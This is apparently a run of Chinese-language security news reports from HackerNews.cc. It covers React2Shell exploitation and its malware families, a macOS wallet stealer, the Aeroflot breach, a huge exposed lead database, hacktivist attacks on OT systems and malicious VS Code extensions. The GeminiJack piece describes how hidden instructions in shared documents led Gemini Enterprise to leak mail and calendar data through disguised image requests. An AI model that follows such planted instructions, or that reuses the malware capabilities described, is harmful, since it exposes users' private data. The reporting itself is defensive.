威胁还延伸至加密货币钱包，该恶意软件专门针对15种不同的桌面和硬件钱包应用程序，包括Ledger Live、Trezor Suite、Exodus、Coinomi、Electrum和Bitcoin Core等。此外，它还会窃取整个macOS钥匙串数据库、Telegram会话数据、VPN配置文件以及桌面和Documents文件夹中的文件。 在数据收集完成后，所有窃取的信息会被压缩，并通过加密通信传输到攻击者的命令与控制服务器。 这一攻击活动代表了恶意软件传播方式的复杂进化，展示了威胁行为者如何不断寻找新方法来绕过安全防护措施，入侵用户系统。   消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 根据Huntress公司的新发现，React2Shell漏洞正持续遭遇大规模利用，威胁行为者利用React服务器组件中一个严重程度最高的安全漏洞，来投递加密货币挖矿程序及一系列此前未被记录的恶意软件家族。 这些新型恶意软件包括一款名为PeerBlight的Linux后门、一个名为CowTunnel的反向代理隧道工具，以及一个被称为ZinFoq的基于Go语言的攻陷后植入程序。 Huntress表示，已检测到攻击者通过CVE-2025-55182漏洞针对众多组织进行攻击。此漏洞是RSC组件中的严重安全缺陷，攻击者可利用该漏洞实现未授权远程代码执行。截至2025年12月8日，攻击已覆盖多个行业，其中建筑业和娱乐业成为主要受害领域。 Huntress首次记录到针对Windows终端的利用尝试可追溯到2025年12月4日。当时，一个未知威胁行为者利用了存在漏洞的Next.js实例来投递一个shell脚本，随后通过命令下载加密货币挖矿程序和Linux后门。 在另外两起事件中，攻击者执行了信息探测命令，并试图从C2服务器下载多个恶意载荷。部分典型入侵事件还专门针对 Linux 主机投放了门罗币加密货币挖矿程序，此外攻击者还会先利用一款公开的GitHub工具定位存在漏洞的 Next.js 实例，再发起攻击。 Huntress研究员指出：“基于在多个终端观察到的持续攻击模式，包括完全相同的漏洞探测、shell代码测试和C2基础设施，我们评估该威胁行为者很可能在利用自动化的漏洞利用工具”，“攻击者向 Windows 终端尝试部署 Linux 专属恶意载荷的行为，进一步佐证了该自动化工具未对目标操作系统进行区分”。 攻击中投放的主要恶意载荷说明 sex.sh：一款bash脚本，可直接从GitHub获取XMRig 6.24.0矿机程序 PeerBlight：Linux后门程序，与2021年出现的RotaJakiro 和Pink两款恶意软件存在部分代码重合；它会创建systemd 服务实现持久化驻留，并伪装成“ksoftirqd”守护进程以躲避检测 CowTunnel：反向代理工具，可主动与攻击者控制的快速反向代理服务器建立出站连接，以此绕过仅监控入站连接的防火墙 ZinFoq：Linux平台ELF格式二进制文件，集成了一套后期渗透框架，具备交互式shell、文件操作、网络跳板、时间戳篡改等功能 d5.sh：投放Sliver C2框架的加载器脚本 fn22.sh：d5.sh的变种，新增了自更新机制，可获取恶意软件新版本并重启运行 wocaosinm.sh：Kaiji DDoS 恶意软件的变种，整合了远程管理、持久化和反检测能力 PeerBlight支持与硬编码的C2服务器建立通信的能力，允许其上传/下载/删除文件、生成反向shell、修改文件权限、运行任意二进制文件以及自我更新。该后门还利用了域名生成算法和BitTorrent分布式哈希表网络作为备用的C2机制。 研究人员解释道：“后门接入DHT网络后，会以固定前缀LOLlolLOL注册节点ID。这9字节的前缀是该僵尸网络的标识，而20字节DHT节点ID的剩余11字节则为随机生成。” Huntress表示，已识别出了超过60个带有LOLlolLOL前缀的唯一节点，同时指出受感染僵尸主机需满足多项条件，才会向其他节点共享自身 C2 配置：需具备有效客户端版本、响应节点需存有可用配置、且需匹配正确的事务 ID。 即便满足所有必要条件，这类僵尸主机也仅会在约三分之一的情况下通过随机校验共享配置，此举或为降低网络流量特征、规避检测。 ZinFoq植入程序同样会向其C2服务器发送心跳信号，并可解析接收的指令，执行以下操作：通过 “/bin/bash” 运行命令、枚举目录、读取或删除文件、从指定 URL 下载更多恶意载荷、窃取文件及系统信息、启动 / 停止 SOCKS5 代理、开启 / 关闭 TCP 端口转发、篡改文件访问和修改时间、建立反向伪终端（PTY）shell连接。 此外，ZinFoq还会清除bash历史记录，并将自身伪装成 44种合法Linux系统服务之一，以此隐藏自身踪迹。 Huntres提醒，鉴于该漏洞 “易被利用且危害等级极高”，所有使用 react-server-dom-webpack、react-server-dom-parcel 或 react-server-dom-turbopack 组件的组织应立即完成版本更新。 此消息发布之际，Shadowserver基金会表示，在优化扫描目标策略后，截至 2025 年 12 月 8 日，已检测到超 16.5 万个存在漏洞代码的 IP 地址和 64.4 万个相关域名。其中美国境内的漏洞实例数量超 9.92 万个，其后依次为德国（1.41 万个）、法国（6400 个）和印度（4500 个）。 消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 谷歌 Gemini 企业级 AI 生态系统中一个新发现的提示词注入漏洞已被修复，该漏洞曾允许攻击者窃取敏感的 Gmail 邮件、文档及日历数据，但专家表示，这只是 AI 漏洞时代的开端。 “GeminiJack” 漏洞存在于谷歌 Gemini Enterprise（此前也存在于 Vertex AI Search）中，由诺玛实验室（Noma Labs）的研究人员于今年 5 月发现，在与谷歌合作完成修复后，该漏洞已于本周二被公开披露。 攻击者利用企业对谷歌 Workspace 工具及共享功能的依赖，能够操纵日常工作流程，进而访问并窃取企业敏感信息。 诺玛实验室指出：“一份共享的谷歌文档、一则谷歌日历邀请，甚至一封 Gmail 邮件，都能瞬间成为侵入企业数据的持续性开放通道。” 更关键的是，诺玛实验室称，与传统软件漏洞不同，GeminiJack 并非常规缺陷，而是谷歌企业级 AI 系统在解读用户提供内容时存在的架构性弱点。 同时，由于该漏洞无需用户任何操作即可造成危害，它也被视为迄今企业级云环境中遭遇的最严重 AI 驱动型安全风险之一。 诺玛实验室在其安全博客中解释：“目标员工无需进行任何点击，不会出现任何警示信号，也不会触发任何传统安全工具。” DryRun Security 首席执行官詹姆斯・威克特（James Wickett）表示：“GeminiJack 这类事件表明，提示词注入和数据泄露已不再是边缘性研究课题，这些漏洞是企业（即便是大型科技公司）将大语言模型接入系统时，深层架构问题的外在表现。” 漏洞攻击原理 诺玛实验室研究人员称，攻击者可在共享文档或消息中嵌入隐藏指令。 当员工后续使用谷歌 Gemini Enterprise AI 执行常规搜索时，AI 助手会自动检索被篡改的内容、执行恶意指令，并通过伪装的外部图片请求，轻松将敏感数据外传。 借助 GeminiJack 零点击漏洞，单次常规 AI 查询就可能泄露以下信息： 数年的内部邮件，包括客户沟通及财务往来信息 完整的日历历史，可泄露商务谈判、合作关系及企业组织运作情况 全部文档库，涵盖合同文件至技术架构方案等各类资料 谷歌方面表示 “已对漏洞披露做出迅速响应”，其团队与诺玛实验室协作 “厘清了攻击路径并实施了全面的缓解措施”。 诺玛实验室称，此次修复解决了检索增强生成（RAG）处理管道中指令与内容混淆的核心问题。 据英伟达定义，检索增强生成（RAG）是一套循环式处理流程，可实时完成文档预处理、数据摄入及嵌入向量生成，将用户查询转化为易于理解的信息，同时最大限度降低模型 “幻觉” 现象。 而所有窃取的数据，都会通过看似正常的图片请求直接流向攻击者，这类请求与合法流量难以区分。 诺玛实验室研究人员评价道：“这是 AI 过度自主权限的典型体现。AI 助手完全按设计逻辑运行，却沦为了可想象到的最高效企业间谍工具。” 谷歌指出，作为修复措施的一部分，Vertex AI Search 现已与 Gemini Enterprise 完全分离，确保二者不再共用同一大语言模型驱动的检索管道。 对于未来的 AI 注入攻击，威克特指出 “我们仍处于 AI 应用初期阶段”。 他认为，在团队为模型输入、检索来源及智能体操作建立起真正的防护屏障前，未来几年内类似 GeminiJack 的故障还会不断出现。 威克特表示：“若缺乏此类管控且不重视构建安全的 AI 应用，这类安全事件大概率会愈发频繁。”     消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 俄罗斯媒体The Bell发布了一篇深度报道，揭秘今年 7 月俄罗斯国家航空公司俄罗斯国际航空公司（俄航，Aeroflot）遭遇的重大黑客攻击事件，证实该公司当时整个基础设施曾濒临崩溃边缘。 早在 7 月，两个亲乌黑客组织 ——“沉默乌鸦（Silent Crow）” 和 “白俄罗斯网络游击队（Belarusian Cyber-Partisans）” 就已宣称对这起针对俄航的攻击负责。 黑客们不仅瘫痪了 7000 台服务器、窃取了乘客及员工数据，还控制了包括高管在内的员工个人电脑。他们透露，此次行动是一场耗时一年的俄航网络渗透计划。 不过，当时现场的实际情况究竟如何？据The Bell报道，与其他多起规模较小的同类攻击不同，俄航遇袭事件根本无法被俄罗斯官方掩盖：数百架航班延误或取消，数千名乘客滞留于大大小小的机场。 尽管如此，俄航仍试图隐瞒。The Bell指出，该航空公司甚至未告知内部员工公司正遭受黑客攻击，反而将事件定性为 “信息系统故障”。但事实上，攻击者当时已险些摧毁其全部基础设施。 紧急切断全楼电源 这场攻击始于 7 月 28 日凌晨 5 时，彼时俄航技术支持群内开始上报紧急情况：系统瘫痪、电脑反复重启且无法恢复。 两小时后，在确认黑客正实时擦除员工办公电脑数据后，俄航下达了 “全面停机” 的指令。 《The Bell》的消息源透露，当时切断总部所有楼层的电源，是阻止攻击者彻底摧毁公司全部网络基础设施的唯一办法。 这是因为，正如黑客后续所言，且有匿名俄航官员向《The Bell》证实的那样，他们已获取了航空公司整个企业网络的管理员权限。 随后，攻击者在俄航企业网络中推送了一项组策略，触发了工作站的定时数据擦除程序。局势一度濒临全面失控 —— 不过俄航团队的应对其实十分迅速。 一位接近仍在进行中的调查的消息人士解释道：“他们切断了与俄罗斯电信公司（Rostelecom）的通信，中断了与机票数据库的连接，还断开了和谢列梅捷沃机场的链路，以至于工作人员只能靠 Excel 表格重建所有数据，在大幅纸上重新绘制全部航线。” “这无疑对公司声誉造成了损害。但如果当时没有如此迅速地行动，公司的基础设施恐怕会荡然无存。” 事发当天，俄航共取消 108 架次航班，仅在其枢纽机场谢列梅捷沃机场，就有超 80 架次航班延误。该航空公司称，此次航班取消造成的损失至少达 2.6 亿卢布（约合 334 万美元）—— 但这个数字其实并不算多。 薄弱环节：合作承包商 尽管直接经济损失有限，此次攻击造成的整体危害却极大。《The Bell》指出，被窃取的数据中，“非商业航班” 相关信息或为最敏感的内容。 原因在于，攻击发生后，黑客公布了一份由俄国防部代表签署的文件，文件中国防部要求将其设备接入俄航内部网络，以 “高效规划军事空运任务”。 一位俄航消息人士指出：“这对俄航是沉重一击。该公司一直将自身定位为纯民用航空公司，过去几年也一直在刻意与战事保持距离，而这份文件却将一切白纸黑字地摆到了台面上。” 该人士认为，这或许正是此次网络攻击的核心目的。 此次攻击的初始入口，似乎是一家名为巴卡软件（Bakka Soft）的小型 IT 公司。该公司负责为俄航开发移动及网页应用，且在攻击发生前一个月，还刚宣布推出了俄航新版 iOS 网页应用。 《The Bell》称，早在 2025 年 1 月，也就是攻击发生前 6 个月，为俄航提供技术支持的 IT 专家就已在俄航及巴卡软件的网络中监测到了可疑活动。 巴卡软件从未公开披露其系统遭黑客入侵的消息，但种种迹象表明入侵确实发生过。 白俄罗斯网络游击队的代表尤利娅娜・舍梅托维茨（Yuliana Shemetovets）指出，俄航管理层使用的是简单且极易被破解的密码。 网络安全专家虽已将入侵者逐出俄航系统，但消息人士称，他们并未彻底清理巴卡软件的基础设施，这使得攻击者得以着手筹备后续的网络攻击。 《The Bell》的一位消息人士惋惜道：“这类事件中，承包商往往是薄弱环节：他们难以及时取得联系、会抗拒配合调查、不允许访问其基础设施，而且基础设施的清理工作也做得一塌糊涂。” 该媒体还联系到白俄罗斯网络游击队代表尤利娅娜・舍梅托维茨，她也指出俄航管理层存在使用简易密码的问题。   消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 企业使用海量联系人数据库虽能大幅节省时间，却存在重大安全隐患。若数据库未加防护，单一数据集的泄露就可能危及数百万用户隐私，而这正是 Cybernews 研究团队近期发现的一起重大数据泄露事件的真实写照。 研究团队发现了一个未设防护的 MongoDB 数据库实例，其中存储的职业与企业情报数据高达 16.14 太字节，总计近 43 亿份文档，堪称迄今泄露规模最大的销售线索数据集之一。 这一重大发现由 Cybernews 撰稿人、网络安全研究员、SecurityDiscovery.com网站所有者鲍勃・迪亚琴科（Bob Diachenko）完成。他于 2025 年 11 月 23 日发现该 43 亿条量级的数据库，两天后数据库所有者才对其完成安全加固。 目前研究人员尚不清楚该数据库在被发现前已暴露多久，但既然团队能找到，不法分子也极有可能早已察觉。这类信息详实、分类规整的大型数据集是攻击者的 “宝藏”，可被用于发动大规模自动化攻击。 海量数据集包含哪些内容？ 43 亿条泄露记录均存储于 MongoDB 数据库中，该数据库常被企业用于存储和处理大规模数据。此次泄露大概率源于人为失误 —— 数据库因未配置适当身份验证而处于暴露状态。 据研究团队介绍，这个超 16 太字节的数据库结构完整，数据应为爬取所得的职业及企业情报，其中包含大量来自领英的详细个人资料、联系方式、企业关联关系及职业经历等信息。 数据集内共发现 9 个数据集合，其命名基本可体现所含信息类型，且各数据集的体量与记录内容差异显著： intent：20.54410607 亿条文档（604.76GB） profiles：11.35462992 亿条文档（5.85TB） unique_profiles：7.32412172 亿条文档（5.63TB） people：1.69061357 亿条文档（3.95TB） sitemap：1.63765524 亿条文档（20.22GB） companies：1730.2088 万条文档（72.9GB） company_sitemap：1730.1617 万条文档（3.76GB） address_cache：812.6667 万条文档（26.78GB） intent_archive：207.3723 万条文档（620MB） 研究人员确认，单个数据集合内的记录均为唯一，但不同数据集合间可能存在重复数据。其中至少 profiles、unique_profiles 和 people 三个集合包含个人身份信息（PII），这三个集合合计近 20 亿条记录，泄露的具体信息包括： 全名 邮箱与电话号码 领英网址及个人主页账号 职位名称、雇主及职业经历 教育背景、学位与证书 地理位置数据 掌握语言、技能及职能 社交媒体账号 图片网址（unique_profiles 集合） 邮箱可信度评分（people 集合） “阿波罗 ID（Apollo ID）” 如此庞大的数据库给所有相关方带来严重隐私隐患。从数据库结构来看，其数据应为领英风格的爬取所得，这意味着邮箱、手机号、岗位及社交关系等大部分数据都具备较高时效性与准确性。此外，unique_profiles 集合含 7.32 亿多条记录，且包含个人照片；people 集合则存有邮箱验证信息、信息完善度评分及社交账号，这类评分常被营销、销售及招聘人员用于评估销售线索或候选人的匹配度。 这批领英相关数据的采集时间难以精准判定，数据库 “更新时间” 戳显示信息于 2025 年完成采集或更新，但 2021 年曾有威胁攻击者宣称爬取了数亿条领英记录，因此该 MongoDB 数据库或包含历史爬取数据。 研究人员还发现，数据库中个人资料、联系人及职业经历的字段格式统一，sitemap 和 company_sitemap 集合含 1.8 亿条记录，可实现网址与个人资料 ID 的关联。团队认为，如此庞大的泄露规模，足以证明数据来源于自动化爬取和信息完善流程。 尽管 “阿波罗 ID” 的具体含义尚不明确，但数据集特征强烈指向其信息源自销售情报工具 Apollo.io。“阿波罗 ID” 的存在打通了领英与 Apollo 两大销售线索生态，形成了一套可用于监控级别的整合数据集。 谁是泄露数据集的所有者？ 截至发稿，数据集归属尚未得到确认，但已有部分线索指向潜在所有者。研究团队发现，数据库中的站点地图集合将 “/people” 和 “/company” 链接指向某销售线索生成公司官网。 该公司主营企业获客服务，可提供大规模 B2B 销售线索数据库，其数据类型与泄露数据库高度吻合。官网宣称服务超 7 亿职场人士，这一数字与 unique_profiles 集合的记录量相近；且在研究人员就潜在数据泄露问题通知该公司后，暴露的数据库次日便被关闭。 研究人员解释：“此类大型数据集是恶意攻击者的首要目标，可作为结合其他数据泄露事件开展信息补全的核心基础，助力攻击者构建可检索的大规模个人信息库，补全后的数据还可能包含密码、设备标识、其他社交账号等信息。” 不过团队暂不直接将泄露归咎于该公司，也存在该公司数据库被数据集实际所有者爬取的可能性。目前 Cybernews 已联系该公司寻求置评，如有回复将更新报道。 此次泄露的危害何在？ 网络犯罪分子可利用这类未防护大型数据库谋取巨额利益。例如，攻击者可借助数据发起定向钓鱼攻击，筛选出企业 CEO 实施 “冒充老板诈骗”，即伪造高管身份诱骗员工转账；也可用于企业情报侦察，就像安全人员会利用员工信息测试企业社会工程学防御一样，攻击者也能借此寻找漏洞、渗透企业系统。 大型企业数据在暗网极具价值，而该数据集中必然包含财富 500 强企业员工信息，攻击者可据此锁定特定目标企业。即便没有这类专属数据库，攻击者也能发起此类攻击，但现成数据集能大幅提升成功率、缩短筹备时间。 此外，攻击者还可利用数据集开展自动化攻击。如今网络犯罪团伙同样热衷 AI 辅助攻击，43 亿条量级的数据集恰好适配这类操作 —— 大语言模型（LLM）可基于用户资料生成个性化恶意邮件，只需稍加操作就能群发数千万封，而只要命中一个高价值目标，整个攻击行动便可获利。 研究人员补充道：“此类大型数据集是恶意攻击者的重点目标，可作为信息补全的核心基础，结合其他泄露数据构建可检索的个人信息库，补全后还可能包含密码、设备标识等信息，大幅降低社会工程学攻击和凭证填充攻击的实施门槛。” 数十亿条记录泄露已成常态 近年来，数十亿条记录级别的重大数据泄露事件已屡见不鲜： 2025 年 6 月，Cybernews 曾报道一起疑似中国地区史上最大规模数据泄露事件，涉及数十亿份文档，含金融数据、微信及支付宝信息等敏感个人信息 2024 年夏，名为 RockYou2024 的迄今最大密码集合（含近 100 亿个唯一密码）在知名黑客论坛泄露；2021 年也曾出现过超 80 亿条记录的同类密码集合泄露 2024 年初，Cybernews 研究团队发现了迄今仍保持规模之最的 “终极数据泄露（MOAB）” 事件，涉及 260 亿条记录 职业及企业信息类大规模泄露也早有先例： 2018 年，Apollo.io 曾因数据库未防护导致数十亿条记录泄露，含 1.25 亿个唯一邮箱 2019 年，美国数据经纪商 People Data Labs 发生数据泄露，波及 6.22 亿人；2024 年 Cybernews 研究人员又发现其一个未防护数据库泄露 1.7 亿多条敏感记录 与此同时，领英一直在严厉打击平台个人资料爬取行为。2025 年 10 月初，领英对软件公司 ProAPIs 及其 CEO 提起诉讼，指控该公司通过创建数十万个虚假账号非法爬取数百万条领英用户资料 领英表示，其用户协议禁止通过自动化机器人爬取数据，也严禁伪造身份或创建虚假账号，强调爬取行为会对用户安全构成威胁。领英在诉状中指出：“一旦数据被爬取，领英及用户均无法阻止被告及其客户将数据用于群发垃圾邮件、出售给诈骗分子，或与其他数据整合形成大型私密数据库等行为。” 消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 据观察，组织松散的支持俄罗斯的黑客行动团体一直在利用暴露的虚拟网络计算连接，入侵多个行业的运营技术系统。 根据美国网络安全和基础设施安全局（CISA）、联邦调查局（FBI）、国家安全局（NSA）及其他国内外合作伙伴发布的一份新报告，这些攻击是近期一波技术含量低但具有破坏性的入侵活动的一部分，影响了美国水处理、食品生产和能源领域的实体。 报告撰写机构指出，“俄罗斯重生网络军”（CARR）、”Z-Pentest”、”NoName057(16)”以及”Sector16″等组织正在使用简单的侦察工具和常见的密码猜测技术，来访问面向互联网的人机界面。 尽管他们的活动水平不如国家支持的威胁组织先进，但在某些情况下已导致实际影响。 CISA表示，这些黑客行动分子通常追求的是曝光度而非战略优势，经常夸大他们在网上公开的事件规模。 即便如此，在攻击者篡改参数、禁用警报或重启设备后，运营商仍面临暂时的监控失灵以及代价高昂的手动恢复工作。 该报告概述了自2022年以来，几个亲俄黑客团体如何扩张，其中一些还得到了与俄罗斯国家有关联组织的间接或直接支持。 CARR和NoName057(16)在2024年组建Z-Pentest之前曾广泛合作，而Sector16则在2025年初通过类似联盟出现。每个团体都依赖广泛可用的工具来扫描端口、暴力破解弱密码、录制被入侵系统的屏幕截图，并在网上传播。 给运营商的建议措施 报告强调，工业和运营技术的所有者应加强系统暴露面管理和认证措施。建议的措施包括： 减少运营技术资产对公共互联网的访问 采用更强的资产管理，例如映射数据流 使用强身份验证，在可能的情况下包括多因素身份验证 报告还强调了网络分段、严格的防火墙策略、软件更新以及允许在系统受损时快速手动操作的应急计划的重要性。 报告警告称，发现存在弱凭证的暴露系统的组织应假定已遭入侵，并立即启动事件响应。 尽管这些攻击仍然相对简单，但报告撰写机构警告称，持续的活动可能会导致更严重的后果。 “本报告中强调的亲俄黑客行动团体已表现出对脆弱系统造成实际损害的意图和能力，” CISA网络安全执行助理局长尼克·安德森警告说。 “除了实施建议的缓解措施并严格验证其安全控制外，我们呼吁所有运营技术设备制造商优先考虑安全设计原则——因为从一开始就构建安全性对于降低风险和保护国家最重要的系统至关重要。” 消息来源：infosecurity-magazine； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 微软恶意软件 一些开发者以为自己安装的是VS Code的深色主题和AI助手。然而，那实际上是窃取其数据的恶意软件。 网络安全公司Koi的研究人员发现了微软Visual Studio Code（VS Code）的新恶意扩展。这两个扩展都是在微软官方市场（Microsoft Marketplace）上发现的，开发者可以在此处为这款流行工具下载扩展。 该恶意软件伪装成受比特币设计启发的高级深色主题和AI编程助手扩展，用信息窃取型恶意软件感染了开发者的设备。这两个扩展都会分发捆绑了恶意DLL文件（“Lightshot.dll”）的Lightshot截图工具。 该恶意软件会窃取剪贴板内容、已安装程序列表、运行进程、桌面截图、存储的Wi-Fi凭据以及详细的系统信息。 它还会以无头模式启动Google Chrome和微软Edge浏览器，窃取存储的浏览Cookie，并可能劫持用户会话。 VS Code恶意软件 “你的代码、你的电子邮件、你的Slack私信。只要你屏幕上的内容，他们都能看到。”Koi Security的研究人员写道。 “它还会窃取你的Wi-Fi密码、读取你的剪贴板，并劫持你的浏览器会话。” 研究人员提醒我们，VS Code主题是JSON文件，它们不需要激活事件、主要入口点或执行PowerShell脚本。这个恶意主题引起了怀疑，因为它会在每次VS Code操作时运行。 作为恶意的AI助手，它确实提供了实际功能，用户可以直接在VS Code中与ChatGPT或DeepSeek聊天机器人对话。这使其看起来更加可信。 然而，在代码内部，就在合法的AI聊天实现之前，研究人员发现了交织其中的恶意代码。攻击者留下了标记他们自己代码中恶意部分的注释。 “这告诉我们一些关于他们的工作流程——他们正在积极维护这个代码库，并希望确保自己或合作者在更新过程中不会意外删除有效载荷交付机制。”研究人员解释道。 恶意扩展名称： BigBlack.bitcoin-black BigBlack.codo-ai BigBlack.mrbigblacktheme 微软已于12月5日和12月8日将这些恶意软件从市场中移除。 虽然前两个恶意扩展已被用户下载，但Koi研究人员告诉The Hacker News，BigBlack.mrbigblacktheme扩展没有造成实际影响，因为它被非常快速地移除了。   消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文